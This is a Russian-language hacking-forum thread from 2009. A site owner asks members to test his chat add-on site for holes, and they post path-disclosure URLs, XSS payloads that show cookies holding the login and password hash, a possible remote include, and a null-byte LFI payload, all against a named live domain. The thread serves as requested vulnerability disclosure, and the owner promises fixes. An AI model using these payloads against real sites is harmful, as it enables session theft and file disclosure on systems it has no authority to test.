HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Проверка на уязвимости
Перезагрузить страницу http://addons.august4u.eu
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

http://addons.august4u.eu
  #1  
Старый 02.07.2009, 03:25
Большой джо
Познающий
Регистрация: 28.06.2009
Сообщений: 56
С нами: 8879374

Репутация: 3
По умолчанию http://addons.august4u.eu
Все привет, вот открыл сервис дополнений к август4у чатам, и надо проверить сайт на уязвимости, прошу протестить сайт пожалста!!!!
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Большой джо; 02.07.2009 в 16:48..
 
Ответить с цитированием

  #2  
Старый 02.07.2009, 18:44
Adm1n4eG
Познающий
Регистрация: 27.03.2009
Сообщений: 40
С нами: 9013008

Репутация: 39
По умолчанию
раскрытие путей:

http://addons.august4u.eu/top/top.php?id=11

Цитата:
Warning: imagecreatefromjpeg(img/logo.jpg) [function.imagecreatefromjpeg]: failed to open stream: No such file or directory in /var/www/[скрыто]/top/top.php on line 35
http://addons.august4u.eu/come.php?comanda=delfriend&idfriend=999999999999

Цитата:
Warning: fopen(datamsg/id999999999999/friend.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 492
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999999999

Цитата:
Warning: fopen(datamsg/id999999999999/black.dat) [function.fopen]: failed to open stream: No such file or directory in /var/www/[скрыто]/come.php on line 424
тут сохраняются файлкеки правда пустые....
http://addons.august4u.eu/datamsg/id1/friend.dat
http://addons.august4u.eu/datamsg/id1/black.dat


теперь XSS (обязательно залогинеца нада):

делаем такой запрос:
http://addons.august4u.eu/come.php?comanda=addfriend&idfriend=999999"><scrip t>alert(document.cookie)</script>999999

и тут смотрим результат:
http://addons.august4u.eu/index.php?comanda=friends

в куках логин и пасс(md5)...
Последний раз редактировалось Adm1n4eG; 02.07.2009 в 19:31..
 
Ответить с цитированием

  #3  
Старый 02.07.2009, 19:31
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами: 9709737

Репутация: 88
По умолчанию
XSS и раскрытие путей тех же.
Цитата:
http://addons.august4u.eu/index.php?comanda=viemfoto&files=1>"><ScRiPt%20%0a
%0d>alert(12345)%3B</ScRiPt>
По идее инклюд, но не крутил на предмет реального выполнения.
Цитата:
http://addons.august4u.eu/index.php?comanda=viemfoto&files=http://www.admin.com
 
Ответить с цитированием

  #4  
Старый 02.07.2009, 21:54
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами: 9423746

Репутация: 2399


По умолчанию
LFI
http://addons.august4u.eu/index.php?comanda=viemfoto&files=../{FILE}%00

сайт в дирах. где не подставлю ковычку - ошибка.
 
Ответить с цитированием

  #5  
Старый 02.07.2009, 22:08
Большой джо
Познающий
Регистрация: 28.06.2009
Сообщений: 56
С нами: 8879374

Репутация: 3
По умолчанию
всем за участие спс, буду переписывать фильтр, и делать более строгую проверку данных))
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.